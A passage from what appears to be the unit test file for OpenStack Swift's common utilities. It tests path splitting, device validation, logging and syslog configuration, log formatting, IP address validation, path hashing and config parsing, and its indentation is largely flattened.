utils.normalize_delete_at_timestamp('71253327593.67890'),
'9999999999')
        self.assertRaises(ValueError,
                          utils.normalize_delete_at_timestamp, '')
        self.assertRaises(ValueError,
                          utils.normalize_delete_at_timestamp, 'abc')
def test_last_modified_date_to_timestamp(self):
expectations = {
'1970-01-01T00:00:00.000000': 0.0,
'2014-02-28T23:22:36.698390': 1393629756.698390,
'2011-03-19T04:03:00.604554': 1300507380.604554,
}
for last_modified, ts in expectations.items():
real = utils.last_modified_date_to_timestamp(last_modified)
self.assertEqual(real, ts, "failed for %s" % last_modified)
def test_last_modified_date_to_timestamp_when_system_not_UTC(self):
try:
old_tz = os.environ.get('TZ')
# Western Argentina Summer Time. Found in glibc manual; this
# timezone always has a non-zero offset from UTC, so this test is
# always meaningful.
os.environ['TZ'] = 'WART4WARST,J1/0,J365/25'
self.assertEqual(utils.last_modified_date_to_timestamp(
'1970-01-01T00:00:00.000000'),
0.0)
finally:
if old_tz is not None:
os.environ['TZ'] = old_tz
else:
os.environ.pop('TZ')
def test_backwards(self):
# Test swift.common.utils.backward
# The lines are designed so that the function would encounter
# all of the boundary conditions and typical conditions.
# Block boundaries are marked with '<>' characters
blocksize = 25
lines = [b'123456789x12345678><123456789\n', # block larger than rest
b'123456789x123>\n', # block ends just before \n character
b'123423456789\n',
b'123456789x\n', # block ends at the end of line
b'<123456789x123456789x123\n',
b'<6789x123\n', # block ends at the beginning of the line
b'6789x1234\n',
b'1234><234\n', # block ends typically in the middle of line
b'123456789x123456789\n']
with TemporaryFile() as f:
for line in lines:
f.write(line)
count = len(lines) - 1
for line in utils.backward(f, blocksize):
self.assertEqual(line, lines[count].split(b'\n')[0])
count -= 1
# Empty file case
with TemporaryFile('r') as f:
self.assertEqual([], list(utils.backward(f)))
def test_mkdirs(self):
testdir_base = mkdtemp()
testroot = os.path.join(testdir_base, 'mkdirs')
try:
self.assertTrue(not os.path.exists(testroot))
utils.mkdirs(testroot)
self.assertTrue(os.path.exists(testroot))
utils.mkdirs(testroot)
self.assertTrue(os.path.exists(testroot))
rmtree(testroot, ignore_errors=1)
testdir = os.path.join(testroot, 'one/two/three')
self.assertTrue(not os.path.exists(testdir))
utils.mkdirs(testdir)
self.assertTrue(os.path.exists(testdir))
utils.mkdirs(testdir)
self.assertTrue(os.path.exists(testdir))
rmtree(testroot, ignore_errors=1)
open(testroot, 'wb').close()
self.assertTrue(not os.path.exists(testdir))
self.assertRaises(OSError, utils.mkdirs, testdir)
os.unlink(testroot)
finally:
rmtree(testdir_base)
def test_split_path(self):
        # Test swift.common.utils.split_path
self.assertRaises(ValueError, utils.split_path, '')
self.assertRaises(ValueError, utils.split_path, '/')
self.assertRaises(ValueError, utils.split_path, '//')
self.assertEqual(utils.split_path('/a'), ['a'])
self.assertRaises(ValueError, utils.split_path, '//a')
self.assertEqual(utils.split_path('/a/'), ['a'])
self.assertRaises(ValueError, utils.split_path, '/a/c')
self.assertRaises(ValueError, utils.split_path, '//c')
self.assertRaises(ValueError, utils.split_path, '/a/c/')
self.assertRaises(ValueError, utils.split_path, '/a//')
self.assertRaises(ValueError, utils.split_path, '/a', 2)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3, True)
self.assertEqual(utils.split_path('/a/c', 2), ['a', 'c'])
self.assertEqual(utils.split_path('/a/c/o', 3), ['a', 'c', 'o'])
self.assertRaises(ValueError, utils.split_path, '/a/c/o/r', 3, 3)
self.assertEqual(utils.split_path('/a/c/o/r', 3, 3, True),
['a', 'c', 'o/r'])
self.assertEqual(utils.split_path('/a/c', 2, 3, True),
['a', 'c', None])
self.assertRaises(ValueError, utils.split_path, '/a', 5, 4)
self.assertEqual(utils.split_path('/a/c/', 2), ['a', 'c'])
self.assertEqual(utils.split_path('/a/c/', 2, 3), ['a', 'c', ''])
try:
utils.split_path('o\nn e', 2)
except ValueError as err:
self.assertEqual(str(err), 'Invalid path: o%0An%20e')
try:
utils.split_path('o\nn e', 2, 3, True)
except ValueError as err:
self.assertEqual(str(err), 'Invalid path: o%0An%20e')
def test_validate_device_partition(self):
# Test swift.common.utils.validate_device_partition
utils.validate_device_partition('foo', 'bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '', '')
self.assertRaises(ValueError,
utils.validate_device_partition, '', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo/bar', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', 'foo/bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '.', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, '..', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '.')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '..')
try:
utils.validate_device_partition('o\nn e', 'foo')
except ValueError as err:
self.assertEqual(str(err), 'Invalid device: o%0An%20e')
try:
utils.validate_device_partition('foo', 'o\nn e')
except ValueError as err:
self.assertEqual(str(err), 'Invalid partition: o%0An%20e')
def test_NullLogger(self):
# Test swift.common.utils.NullLogger
sio = StringIO()
nl = utils.NullLogger()
nl.write('test')
self.assertEqual(sio.getvalue(), '')
def test_LoggerFileObject(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
sio = StringIO()
handler = logging.StreamHandler(sio)
logger = logging.getLogger()
logger.addHandler(handler)
        lfo_stdout = utils.LoggerFileObject(logger)
        lfo_stderr = utils.LoggerFileObject(logger, 'STDERR')
print('test1')
self.assertEqual(sio.getvalue(), '')
sys.stdout = lfo_stdout
print('test2')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\n')
sys.stderr = lfo_stderr
print('test4', file=sys.stderr)
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n')
sys.stdout = orig_stdout
print('test5')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n')
print('test6', file=sys.stderr)
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\n')
sys.stderr = orig_stderr
print('test8')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\n')
lfo_stdout.writelines(['a', 'b', 'c'])
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\n')
lfo_stdout.close()
lfo_stderr.close()
lfo_stdout.write('d')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
lfo_stdout.flush()
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
for lfo in (lfo_stdout, lfo_stderr):
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assertTrue(got_exc)
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assertTrue(got_exc)
self.assertRaises(IOError, lfo.read)
self.assertRaises(IOError, lfo.read, 1024)
self.assertRaises(IOError, lfo.readline)
self.assertRaises(IOError, lfo.readline, 1024)
lfo.tell()
def test_LoggerFileObject_recursion(self):
crashy_calls = [0]
class CrashyLogger(logging.Handler):
def emit(self, record):
crashy_calls[0] += 1
try:
# Pretend to be trying to send to syslog, but syslogd is
# dead. We need the raise here to set sys.exc_info.
raise socket.error(errno.ENOTCONN, "This is an ex-syslog")
except socket.error:
self.handleError(record)
logger = logging.getLogger()
logger.addHandler(CrashyLogger())
# Set up some real file descriptors for stdio. If you run
# nosetests with "-s", you already have real files there, but
# otherwise they're StringIO objects.
#
# In any case, since capture_stdio() closes sys.stdin and friends,
# we'd want to set up some sacrificial files so as to not goof up
# the testrunner.
new_stdin = open(os.devnull, 'r+b')
new_stdout = open(os.devnull, 'w+b')
new_stderr = open(os.devnull, 'w+b')
with contextlib.closing(new_stdin), contextlib.closing(new_stdout), \
contextlib.closing(new_stderr):
# logging.raiseExceptions is set to False in test/__init__.py, but
# is True in Swift daemons, and the error doesn't manifest without
# it.
with mock.patch('sys.stdin', new_stdin), \
mock.patch('sys.stdout', new_stdout), \
mock.patch('sys.stderr', new_stderr), \
mock.patch.object(logging, 'raiseExceptions', True):
# Note: since stdio is hooked up to /dev/null in here, using
# pdb is basically impossible. Sorry about that.
utils.capture_stdio(logger)
logger.info("I like ham")
        self.assertTrue(crashy_calls[0] >= 1)
def test_parse_options(self):
# Get a file that is definitely on disk
with NamedTemporaryFile() as f:
conf_file = f.name
conf, options = utils.parse_options(test_args=[conf_file])
self.assertEqual(conf, conf_file)
# assert defaults
self.assertEqual(options['verbose'], False)
self.assertTrue('once' not in options)
# assert verbose as option
conf, options = utils.parse_options(test_args=[conf_file, '-v'])
self.assertEqual(options['verbose'], True)
# check once option
conf, options = utils.parse_options(test_args=[conf_file],
once=True)
self.assertEqual(options['once'], False)
test_args = [conf_file, '--once']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEqual(options['once'], True)
# check options as arg parsing
test_args = [conf_file, 'once', 'plugin_name', 'verbose']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEqual(options['verbose'], True)
self.assertEqual(options['once'], True)
self.assertEqual(options['extra_args'], ['plugin_name'])
def test_parse_options_errors(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
stdo = StringIO()
stde = StringIO()
utils.sys.stdout = stdo
utils.sys.stderr = stde
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[])
self.assertTrue('missing config' in stdo.getvalue())
# verify conf file must exist, context manager will delete temp file
with NamedTemporaryFile() as f:
conf_file = f.name
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[conf_file])
self.assertTrue('unable to locate' in stdo.getvalue())
# reset stdio
utils.sys.stdout = orig_stdout
utils.sys.stderr = orig_stderr
def test_dump_recon_cache(self):
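        # dump_recon_cache should merge new entries into whatever is already
        # stored in the cache file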
testdir_base = mkdtemp()
testcache_file = os.path.join(testdir_base, 'cache.recon')
logger = utils.get_logger(None, 'server', log_route='server')
try:
submit_dict = {'key1': {'value1': 1, 'value2': 2}}
utils.dump_recon_cache(submit_dict, testcache_file, logger)
fd = open(testcache_file)
file_dict = json.loads(fd.readline())
fd.close()
self.assertEqual(submit_dict, file_dict)
# Use a nested entry
submit_dict = {'key1': {'key2': {'value1': 1, 'value2': 2}}}
result_dict = {'key1': {'key2': {'value1': 1, 'value2': 2},
'value1': 1, 'value2': 2}}
utils.dump_recon_cache(submit_dict, testcache_file, logger)
fd = open(testcache_file)
file_dict = json.loads(fd.readline())
fd.close()
self.assertEqual(result_dict, file_dict)
finally:
rmtree(testdir_base)
def test_dump_recon_cache_permission_denied(self):
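        # an IOError while writing the cache file should be logged via
        # logger.exception() rather than raised to the caller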
testdir_base = mkdtemp()
testcache_file = os.path.join(testdir_base, 'cache.recon')
class MockLogger(object):
def __init__(self):
self._excs = []
def exception(self, message):
_junk, exc, _junk = sys.exc_info()
self._excs.append(exc)
logger = MockLogger()
try:
submit_dict = {'key1': {'value1': 1, 'value2': 2}}
with mock.patch(
'swift.common.utils.NamedTemporaryFile',
side_effect=IOError(13, 'Permission Denied')):
utils.dump_recon_cache(submit_dict, testcache_file, logger)
self.assertIsInstance(logger._excs[0], IOError)
finally:
rmtree(testdir_base)
def test_get_logger(self):
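        # DEBUG messages should not be logged unless log_level is configured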
sio = StringIO()
logger = logging.getLogger('server')
logger.addHandler(logging.StreamHandler(sio))
logger = utils.get_logger(None, 'server', log_route='server')
logger.warning('test1')
self.assertEqual(sio.getvalue(), 'test1\n')
logger.debug('test2')
self.assertEqual(sio.getvalue(), 'test1\n')
logger = utils.get_logger({'log_level': 'DEBUG'}, 'server',
log_route='server')
logger.debug('test3')
self.assertEqual(sio.getvalue(), 'test1\ntest3\n')
        # Doesn't really test that the log facility is truly being used all
        # the way to syslog, but it at least exercises the code path.
logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server',
log_route='server')
logger.warning('test4')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure debug doesn't log by default
logger.debug('test5')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure notice lvl logs by default
logger.notice('test6')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\ntest6\n')
def test_get_logger_sysloghandler_plumbing(self):
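        # capture the args passed to SysLogHandler to verify the address and
        # facility plumbing for unix-socket and UDP configurations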
orig_sysloghandler = utils.SysLogHandler
syslog_handler_args = []
def syslog_handler_catcher(*args, **kwargs):
syslog_handler_args.append((args, kwargs))
return orig_sysloghandler(*args, **kwargs)
syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0
syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3
try:
utils.SysLogHandler = syslog_handler_catcher
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
}, 'server', log_route='server')
expected_args = [((), {'address': '/dev/log',
'facility': orig_sysloghandler.LOG_LOCAL3})]
if not os.path.exists('/dev/log') or \
os.path.isfile('/dev/log') or \
os.path.isdir('/dev/log'):
                # Since the syslog socket on OS X lives at /var/run/syslog
                # rather than /dev/log, there will be a fallback to UDP.
expected_args.append(
((), {'facility': orig_sysloghandler.LOG_LOCAL3}))
self.assertEqual(expected_args, syslog_handler_args)
syslog_handler_args = []
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
'log_address': '/foo/bar',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': '/foo/bar',
'facility': orig_sysloghandler.LOG_LOCAL3}),
# Second call is because /foo/bar didn't exist (and wasn't a
# UNIX domain socket).
((), {'facility': orig_sysloghandler.LOG_LOCAL3})],
syslog_handler_args)
# Using UDP with default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': ('syslog.funtimes.com',
logging.handlers.SYSLOG_UDP_PORT),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
# Using UDP with non-default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
'log_udp_port': '2123',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': ('syslog.funtimes.com', 2123),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
finally:
utils.SysLogHandler = orig_sysloghandler
@reset_logger_state
def test_clean_logger_exception(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
def log_exception(exc):
try:
raise exc
except (Exception, Timeout):
logger.exception('blah')
try:
# establish base case
self.assertEqual(strip_value(sio), '')
logger.info('test')
self.assertEqual(strip_value(sio), 'test\n')
self.assertEqual(strip_value(sio), '')
logger.info('test')
logger.info('test')
self.assertEqual(strip_value(sio), 'test\ntest\n')
self.assertEqual(strip_value(sio), '')
# test OSError
for en in (errno.EIO, errno.ENOSPC):
log_exception(OSError(en, 'my %s error message' % en))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my %s error message' % en in log_msg)
# unfiltered
log_exception(OSError())
self.assertTrue('Traceback' in strip_value(sio))
# test socket.error
log_exception(socket.error(errno.ECONNREFUSED,
'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
            self.assertTrue('my error message' not in log_msg)
self.assertTrue('Connection refused' in log_msg)
log_exception(socket.error(errno.EHOSTUNREACH,
'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my error message' not in log_msg)
self.assertTrue('Host unreachable' in log_msg)
log_exception(socket.error(errno.ETIMEDOUT, 'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my error message' not in log_msg)
self.assertTrue('Connection timeout' in log_msg)
# unfiltered
log_exception(socket.error(0, 'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' in log_msg)
self.assertTrue('my error message' in log_msg)
# test eventlet.Timeout
connection_timeout = ConnectionTimeout(42, 'my error message')
log_exception(connection_timeout)
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('ConnectionTimeout' in log_msg)
self.assertTrue('(42s)' in log_msg)
self.assertTrue('my error message' not in log_msg)
connection_timeout.cancel()
message_timeout = MessageTimeout(42, 'my error message')
log_exception(message_timeout)
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('MessageTimeout' in log_msg)
self.assertTrue('(42s)' in log_msg)
self.assertTrue('my error message' in log_msg)
message_timeout.cancel()
# test unhandled
log_exception(Exception('my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' in log_msg)
self.assertTrue('my error message' in log_msg)
finally:
logger.logger.removeHandler(handler)
@reset_logger_state
def test_swift_log_formatter_max_line_length(self):
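        # lines longer than max_line_length are collapsed to 'head ... tail';
        # very small limits simply truncate, and a limit <= 0 disables it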
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
formatter = utils.SwiftLogFormatter(max_line_length=10)
handler.setFormatter(formatter)
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
try:
logger.info('12345')
self.assertEqual(strip_value(sio), '12345\n')
logger.info('1234567890')
self.assertEqual(strip_value(sio), '1234567890\n')
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12 ... de\n')
formatter.max_line_length = 11
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123 ... cde\n')
formatter.max_line_length = 0
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234567890abcde\n')
formatter.max_line_length = 1
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1\n')
formatter.max_line_length = 2
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12\n')
formatter.max_line_length = 3
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123\n')
formatter.max_line_length = 4
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234\n')
formatter.max_line_length = 5
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12345\n')
formatter.max_line_length = 6
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123456\n')
formatter.max_line_length = 7
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1 ... e\n')
formatter.max_line_length = -10
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234567890abcde\n')
finally:
logger.logger.removeHandler(handler)
@reset_logger_state
def test_swift_log_formatter(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
handler.setFormatter(utils.SwiftLogFormatter())
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
try:
self.assertFalse(logger.txn_id)
logger.error('my error message')
log_msg = strip_value(sio)
self.assertTrue('my error message' in log_msg)
self.assertTrue('txn' not in log_msg)
logger.txn_id = '12345'
logger.error('test')
log_msg = strip_value(sio)
self.assertTrue('txn' in log_msg)
self.assertTrue('12345' in log_msg)
# test txn in info message
self.assertEqual(logger.txn_id, '12345')
logger.info('test')
log_msg = strip_value(sio)
self.assertTrue('txn' in log_msg)
self.assertTrue('12345' in log_msg)
# test txn already in message
self.assertEqual(logger.txn_id, '12345')
logger.warning('test 12345 test')
self.assertEqual(strip_value(sio), 'test 12345 test\n')
# Test multi line collapsing
logger.error('my\nerror\nmessage')
log_msg = strip_value(sio)
self.assertTrue('my#012error#012message' in log_msg)
# test client_ip
self.assertFalse(logger.client_ip)
logger.error('my error message')
log_msg = strip_value(sio)
self.assertTrue('my error message' in log_msg)
self.assertTrue('client_ip' not in log_msg)
logger.client_ip = '1.2.3.4'
logger.error('test')
log_msg = strip_value(sio)
self.assertTrue('client_ip' in log_msg)
self.assertTrue('1.2.3.4' in log_msg)
# test no client_ip on info message
self.assertEqual(logger.client_ip, '1.2.3.4')
logger.info('test')
log_msg = strip_value(sio)
self.assertTrue('client_ip' not in log_msg)
self.assertTrue('1.2.3.4' not in log_msg)
# test client_ip (and txn) already in message
self.assertEqual(logger.client_ip, '1.2.3.4')
logger.warning('test 1.2.3.4 test 12345')
self.assertEqual(strip_value(sio), 'test 1.2.3.4 test 12345\n')
finally:
logger.logger.removeHandler(handler)
def test_storage_directory(self):
self.assertEqual(utils.storage_directory('objects', '1', 'ABCDEF'),
'objects/1/DEF/ABCDEF')
def test_is_valid_ip(self):
self.assertTrue(is_valid_ip("127.0.0.1"))
self.assertTrue(is_valid_ip("10.0.0.1"))
ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "fe80:0:0:0:204:61ff:fe9d:f156"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "fe80::204:61ff:fe9d:f156"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "fe80:0000:0000:0000:0204:61ff:254.157.241.86"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "fe80:0:0:0:0204:61ff:254.157.241.86"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "fe80::204:61ff:254.157.241.86"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "fe80::"
self.assertTrue(is_valid_ip(ipv6))
ipv6 = "::1"
self.assertTrue(is_valid_ip(ipv6))
not_ipv6 = "3ffe:0b00:0000:0001:0000:0000:000a"
self.assertFalse(is_valid_ip(not_ipv6))
not_ipv6 = "1:2:3:4:5:6::7:8"
self.assertFalse(is_valid_ip(not_ipv6))
def test_is_valid_ipv4(self):
self.assertTrue(is_valid_ipv4("127.0.0.1"))
self.assertTrue(is_valid_ipv4("10.0.0.1"))
ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "fe80:0:0:0:204:61ff:fe9d:f156"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "fe80::204:61ff:fe9d:f156"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "fe80:0000:0000:0000:0204:61ff:254.157.241.86"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "fe80:0:0:0:0204:61ff:254.157.241.86"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "fe80::204:61ff:254.157.241.86"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "fe80::"
self.assertFalse(is_valid_ipv4(ipv6))
ipv6 = "::1"
self.assertFalse(is_valid_ipv4(ipv6))
not_ipv6 = "3ffe:0b00:0000:0001:0000:0000:000a"
self.assertFalse(is_valid_ipv4(not_ipv6))
not_ipv6 = "1:2:3:4:5:6::7:8"
self.assertFalse(is_valid_ipv4(not_ipv6))
def test_is_valid_ipv6(self):
self.assertFalse(is_valid_ipv6("127.0.0.1"))
self.assertFalse(is_valid_ipv6("10.0.0.1"))
ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "fe80:0:0:0:204:61ff:fe9d:f156"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "fe80::204:61ff:fe9d:f156"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "fe80:0000:0000:0000:0204:61ff:254.157.241.86"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "fe80:0:0:0:0204:61ff:254.157.241.86"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "fe80::204:61ff:254.157.241.86"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "fe80::"
self.assertTrue(is_valid_ipv6(ipv6))
ipv6 = "::1"
self.assertTrue(is_valid_ipv6(ipv6))
not_ipv6 = "3ffe:0b00:0000:0001:0000:0000:000a"
self.assertFalse(is_valid_ipv6(not_ipv6))
not_ipv6 = "1:2:3:4:5:6::7:8"
self.assertFalse(is_valid_ipv6(not_ipv6))
def test_expand_ipv6(self):
expanded_ipv6 = "fe80::204:61ff:fe9d:f156"
upper_ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(upper_ipv6))
omit_ipv6 = "fe80:0000:0000::0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(omit_ipv6))
less_num_ipv6 = "fe80:0:00:000:0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(less_num_ipv6))
def test_whataremyips(self):
myips = utils.whataremyips()
self.assertTrue(len(myips) > 1)
self.assertTrue('127.0.0.1' in myips)
def test_whataremyips_bind_to_all(self):
for any_addr in ('0.0.0.0', '0000:0000:0000:0000:0000:0000:0000:0000',
'::0', '::0000', '::',
# Wacky parse-error input produces all IPs
'I am a bear'):
myips = utils.whataremyips(any_addr)
self.assertTrue(len(myips) > 1)
self.assertTrue('127.0.0.1' in myips)
def test_whataremyips_bind_ip_specific(self):
self.assertEqual(['1.2.3.4'], utils.whataremyips('1.2.3.4'))
def test_whataremyips_error(self):
def my_interfaces():
return ['eth0']
def my_ifaddress_error(interface):
raise ValueError
with patch('netifaces.interfaces', my_interfaces), \
patch('netifaces.ifaddresses', my_ifaddress_error):
self.assertEqual(utils.whataremyips(), [])
def test_whataremyips_ipv6(self):
test_ipv6_address = '2001:6b0:dead:beef:2::32'
test_interface = 'eth0'
def my_ipv6_interfaces():
return ['eth0']
def my_ipv6_ifaddresses(interface):
return {AF_INET6:
[{'netmask': 'ffff:ffff:ffff:ffff::',
'addr': '%s%%%s' % (test_ipv6_address, test_interface)}]}
with patch('netifaces.interfaces', my_ipv6_interfaces), \
patch('netifaces.ifaddresses', my_ipv6_ifaddresses):
myips = utils.whataremyips()
self.assertEqual(len(myips), 1)
self.assertEqual(myips[0], test_ipv6_address)
def test_hash_path(self):
        # Yes, these tests are deliberately very fragile. We want to make sure
        # that if someone changes the results hash_path produces, they know it.
with mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''):
self.assertEqual(utils.hash_path('a'),
'1c84525acb02107ea475dcd3d09c2c58')
self.assertEqual(utils.hash_path('a', 'c'),
'33379ecb053aa5c9e356c68997cbb59e')
self.assertEqual(utils.hash_path('a', 'c', 'o'),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=True),
'\x06\xfb\xf0\xb5\x14\xe5\x19\x9d\xfcN'
'\x00\xf4.\xb5\xea\x83')
self.assertRaises(ValueError, utils.hash_path, 'a', object='o')
utils.HASH_PATH_PREFIX = 'abcdef'
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False),
'363f9b535bfb7d17a43a46a358afca0e')
def test_validate_hash_conf(self):
# no section causes InvalidHashPathConfigError
self._test_validate_hash_conf([], [], True)
# 'swift-hash' section is there but no options causes
# InvalidHashPathConfigError
self._test_validate_hash_conf(['swift-hash'], [], True)
        # if we have the section and either the prefix or the suffix option,
# InvalidHashPathConfigError doesn't occur
self._test_validate_hash_conf(
['swift-hash'], ['swift_hash_path_prefix'], False)
self._test_validate_hash_conf(
['swift-hash'], ['swift_hash_path_suffix'], False)
        # likewise, if we have the section and both options,
        # InvalidHashPathConfigError doesn't occur
self._test_validate_hash_conf(
['swift-hash'],
['swift_hash_path_suffix', 'swift_hash_path_prefix'], False)
        # But an invalid section name should raise an error even if valid
# options are there
self._test_validate_hash_conf(
['swift-hash-xxx'],
['swift_hash_path_suffix', 'swift_hash_path_prefix'], True)
def _test_validate_hash_conf(self, sections, options, should_raise_error):
class FakeConfigParser(object):
def read(self, conf_path):
return True
def get(self, section, option):
if section not in sections:
raise NoSectionError('section error')
elif option not in options:
raise NoOptionError('option error', 'this option')
else:
return 'some_option_value'
with mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
mock.patch('swift.common.utils.HASH_PATH_SUFFIX', ''), \
mock.patch('swift.common.utils.ConfigParser',
FakeConfigParser):
try:
utils.validate_hash_conf()
except utils.InvalidHashPathConfigError:
if not should_raise_error:
self.fail('validate_hash_conf should not raise an error')
else:
if should_raise_error:
self.fail('validate_hash_conf should raise an error')
def test_load_libc_function(self):
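        # missing libc symbols yield a callable no-op unless fail_if_missing
        # is set, in which case AttributeError is raised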
self.assertTrue(callable(
utils.load_libc_function('printf')))
self.assertTrue(callable(
utils.load_libc_function('some_not_real_function')))
self.assertRaises(AttributeError,
utils.load_libc_function, 'some_not_real_function',
fail_if_missing=True)
def test_readconf(self):
conf = '''[section1]
foo = bar
[section2]
log_name = yarr'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
        with os.fdopen(fd, 'w') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': 'yarr'}}
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1')
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar'}
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile,
'section2').get('log_name')
expected = 'yarr'
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
log_name='foo').get('log_name')
expected = 'foo'
self.assertEqual(result, expected)
